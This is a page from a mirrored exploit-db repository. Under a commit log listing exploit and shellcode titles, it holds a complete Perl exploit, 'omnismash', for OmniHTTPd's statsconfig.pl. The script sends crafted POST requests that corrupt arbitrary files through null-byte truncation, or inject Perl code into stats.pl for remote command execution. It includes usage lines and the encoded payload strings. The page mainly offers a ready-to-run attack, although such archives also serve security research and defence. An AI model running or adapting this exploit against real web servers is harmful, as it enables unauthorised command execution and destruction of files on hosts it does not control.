bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/20557.pl
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

167 lines
No EOL
6.8 KiB
Perl
Executable file
Raw Blame History

source: https://www.securityfocus.com/bid/2211/info
OmniHTTPD is a compact Windows based web server by Omnicron Technologies. OmniHTTPD has various features including multiple domain support, keep-alive connections, supports virtual IP and non-IP servers and standard CGI support.
Due to the implementation of 'statsconfig.pl' multiple vulnerabilities exist in OmniHTTPD. It is possible to corrupt various known filenames and execute arbitrary commands. By appending a known filename to the 'cgidir' form variable accompanied with a null argument, the known filename will be corrupt. In addition, it is possible to execute commands on the target server. This is due to statsconfig.pl creating a perl script on the file. When the perl script is created, user supplied data (the mostbrowsers form variable if it is present) is written directly to the perl script file. If an attacker sets this value to semi-colon separated perl commands, they will be executed when statsconfig runs the script. This can result in an attacker gaining interactive access on the victim host with the privilege level of the webserver/cgi process.
Successful exploitation of this vulnerability could lead to complete comprimise of the host or denial of service.
#!/usr/bin/perl
######################################################
# #
# omnismash v1.2 by Joe Testa [01.08.2001 9:26PM] #
# ( joetesta@hushmail.com ) #
# #
######################################################
# #
# This program exploits two holes in #
# 'statsconfig.pl', a cgi script which is installed #
# by default by OmniHTTPd v2.07 (and possibly older #
# versions). #
# #
# 1.) Any file on the system may be corrupted, #
# including those on drives the server does not #
# reside on. #
# #
# #
# Example: #
# #
# perl omnismash.pl localhost 80 -corrupt #
# c:\autoexec.bak #
# #
# #
# 2.) Code can be injected into #
# '/cgi-bin/stats.pl'. The absolute path to the #
# the 'cgi-bin' must already be known. #
# #
# #
# Example: #
# #
# perl omnismash.pl localhost 80 -inject #
# c:/httpd/cgi-bin #
# #
# This exploit is set to insert a bare 'open()' call #
# to allow command execution like so: #
# #
# http://localhost/cgi-bin/stats.pl?|dir #
# #
######################################################
use IO::Socket;
print "\nomnismash v1.2 by Joe Testa [01.08.2001 9:26PM]\n";
print " ( joetesta\@hushmail.com )\n\n\n";
if ( scalar @ARGV < 4 ) {
print "usage: perl omnismash.pl target port " .
"[ -inject cgipath | -corrupt file ]\n";
exit();
}
$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$inject_or_corrupt = $ARGV[ 2 ];
$stuff = $ARGV[ 3 ];
print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
PeerPort => int( $port ),
Proto => 'tcp' );
die "$!" unless $sock;
print "done.\n";
if ( $inject_or_corrupt eq '-inject' ) {
$worthless_stuff = "perllib=" . $stuff . "/statsconfig.pl%00&" .
"cgidir=" . $stuff;
$more_worthless_stuff = "&deflimit=&mostip=on&mostreq=on&" .
"mostbrowsers=on&timelog=on&mostipnum=5&" .
"mostreqf=5&mostbrowsernum=5";
$semi_important_stuff = ";%20if(\$ENV{'QUERY_STRING'})" .
"{open(QS,\$ENV{'QUERY_STRING'});}\$a%3D1&" .
"logloc=c%3A%2Fhttpd%2Flogs%2Faccess.log&" .
"imagebar=%2Fstatsbar.gif&" .
"serveradd=%3C%21--%23echo+var%3D&" .
"barwidth=100&barheight=5&listpass=&" .
"bgcolor=%23FFFFFF&bgimage=&" .
"ttBGcolor=%23FFFFDD";
$exploit = $worthless_stuff . $more_worthless_stuff .
$semi_important_stuff;
} elsif ( $inject_or_corrupt eq '-corrupt' ) {
# Cheap hex encoding....
$stuff =~ s/:/\%3A/g; # ':' => %3A
$stuff =~ s/\\/\%2F/g; # '\' => %2F
$stuff =~ s/\//\%2F/g; # '/' => %2F
$stuff =~ s/ /\%20/g; # ' ' => %20
$stuff =~ s/\./%2E/g; # '.' => %2E
# This appends a hex-encoded null character to the file to truncate
# text that is appended to it by statsconfig.pl during processing.
$stuff .= "%00";
# Construct the exploit string. This does nothing more than set
# the 'perllib' and 'cgidir' fields to our null-padded filename,
# then add additional fields to pass a series of "if()" checks.
$worthless_stuff = "&deflimit=&mostip=on&mostreq=on&" .
"mostbrowsers=on&timelog=on&mostipnum=5&" .
"mostreqf=5&mostbrowsernum=5&" .
"logloc=c%3A%2Fhttpd%2Flogs%2Faccess.log&" .
"imagebar=%2Fstatsbar.gif&" .
"serveradd=%3C%21--%23echo+var%3D&" .
"barwidth=100&barheight=5&listpass=&" .
"bgcolor=%23FFFFFF&bgimage=&" .
"ttBGcolor=%23FFFFDD";
$exploit = "perllib=" . $stuff . "&cgidir=" . $stuff .
$worthless_stuff;
}
$length = length( $exploit );
# Write the string to the socket...
print "Sending exploit string... ";
print $sock "POST /cgi-bin/statsconfig.pl HTTP/1.0\n";
print $sock "Content-type: application/x-www-form-urlencoded\n";
print $sock "Content-length: $length\n\n";
print $sock $exploit;
print "done.\n";
# Read result from server...
print "Waiting for response...\n\n";
read( $sock, $buffer, 1024 );
print $buffer;
close( $sock );
exit();
Reference in a new issue View git blame Copy permalink